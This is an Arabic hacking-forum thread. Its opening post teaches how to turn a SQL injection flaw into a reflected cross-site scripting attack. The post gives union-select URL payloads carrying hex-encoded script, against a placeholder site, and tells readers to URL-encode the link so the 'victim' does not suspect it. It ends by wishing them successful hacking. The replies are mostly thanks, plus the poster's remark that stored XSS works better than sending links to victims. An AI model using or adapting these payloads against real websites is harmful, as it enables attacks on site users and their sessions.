التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 08-03-2011, 02:46 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

.... العلاقة ما بين SQL injection & XSS


السلام عليكم ،
الجميع يعرف الحقن والثغرة الاخرىى ولكن هل يمكننا استغلال ثغرة الحقن لتوليد xss يمكن ذلك ولكن بعدة شروط ،

الشرط الاول :
- ظهور الاعمدة المصابة في الصفحة مثلا 1و2و3 ....
الشرط الثاني:
- دالة hex تكون غير محظورة لاننا سنتغلها لحقن كود الجافا،

نأتي للطريقة :
مثلا لديك رابط حقن في الموقع

كود:
http://www.site.com/index.php?id=-1+union+select+1--
نستبدل الرقم 1 الاخير بدالة hex
ونشفر الكود ***************('9');</script> بستخدام اي موقع تشفير او اضافة firefox المسماة hackbar

انا شفرتها لكم :
كود:
0x3c7363726970743e616c6572742839293b3c2f7363726970743e
يصبح رابط xss الذي سترسله للضحية بالشكل التالي

كود:
http://www.site.com/index.php?id=-1+union+select+hex(0x3c7363726970743e616c6572742839293b3c2f7363726970743e)--
طبعا يمكنك ان تعمل عملية url encode لتعليمات union +select الإخفائها حتى لا يشك الضحية ،
في الختام اختراق موفق ،
اذا عجبك الموضوع قيمني




hgughrm lh fdk SQL injection & XSS la;,v injection a;v a;vh sql sql injection xss

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 


التعديل الأخير تم بواسطة bleu moon ; 08-05-2011 الساعة 07:46 PM.

   

رد مع اقتباس
قديم 08-04-2011, 12:11 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية pirata
 

 

 
إحصائية العضو






pirata غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
pirata is on a distinguished road

افتراضي


مشكور

   

رد مع اقتباس
قديم 08-04-2011, 12:22 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


هه حلو يا ايروون موضوع مميز من عضو اكثر من مميز هه

   

رد مع اقتباس
قديم 08-04-2011, 01:01 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
vpn_31
Security
 
الصورة الرمزية vpn_31
 

 

 
إحصائية العضو








vpn_31 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
vpn_31 is on a distinguished road

افتراضي


مشكور ياحب عل شرح والتوضيح

التوقيع

d0nt mess with me ;)

 

   

رد مع اقتباس
قديم 08-04-2011, 07:22 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية ssmba
 

 

 
إحصائية العضو





ssmba غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ssmba is on a distinguished road

افتراضي


مشكور

   

رد مع اقتباس
قديم 08-04-2011, 07:27 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي


بارك الله فيك أخي
موضوع أكثر من الرائع
التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 

   

رد مع اقتباس
قديم 08-05-2011, 07:04 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

افتراضي


وين التقييم ،؟؟؟ لا بأس هناك بعد الثغرات اصبحت مدموجة مع بعض ونوعا ما ثغرة xss اصبحت تطفو إلى السطح والاهتمام يزيد بها ولكن للأسف الثغرة المخزنة في قواعد البيانات افضل من الثغرة الانية ( ارسال رابط للضحية ) لان نسبة الاخيرة في الفشل هي اكبر

التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 08-14-2011, 11:28 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية almazzikaty
 

 

 
إحصائية العضو






almazzikaty غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
almazzikaty is on a distinguished road

افتراضي


شرح رائع مشكوووور

   

رد مع اقتباس
قديم 08-26-2011, 06:51 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو






عبقري زمانك غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
عبقري زمانك is on a distinguished road

افتراضي رد: العلاقة ما بين SQL injection & XSS



شكرا

   

رد مع اقتباس
قديم 08-27-2011, 04:16 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي رد: العلاقة ما بين SQL injection & XSS


خطوة صحيحة
مشكور ع المعلومة واصل تمييزك

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 09-03-2011, 03:41 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية tahahmed
 

 

 
إحصائية العضو






tahahmed غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
tahahmed is on a distinguished road

افتراضي رد: العلاقة ما بين SQL injection & XSS


جزاك الله خير

   

رد مع اقتباس
قديم 10-25-2011, 07:30 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو






يحيى زكريا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
يحيى زكريا is on a distinguished road

افتراضي رد: العلاقة ما بين SQL injection & XSS


جزاك الله خير

   

رد مع اقتباس
قديم 10-26-2011, 07:10 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو






إُلقنـآصّ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
إُلقنـآصّ is on a distinguished road

افتراضي رد: العلاقة ما بين SQL injection & XSS


شكلة موضوع جامد بس انا دخلت للعميق ولسا مادخلت للبدايه .،

شكرا لك استاذي القدير

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
مشكور, injection, شكر, شكرا, sql, sql injection, xss

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:49 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0